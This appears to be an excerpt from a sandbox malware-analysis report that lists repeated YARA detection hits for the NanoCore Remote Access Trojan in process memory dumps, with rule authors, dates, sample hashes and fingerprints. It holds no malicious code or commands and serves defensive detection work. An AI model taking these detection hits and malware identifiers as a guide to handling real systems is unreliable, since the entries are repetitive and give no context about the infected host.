      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
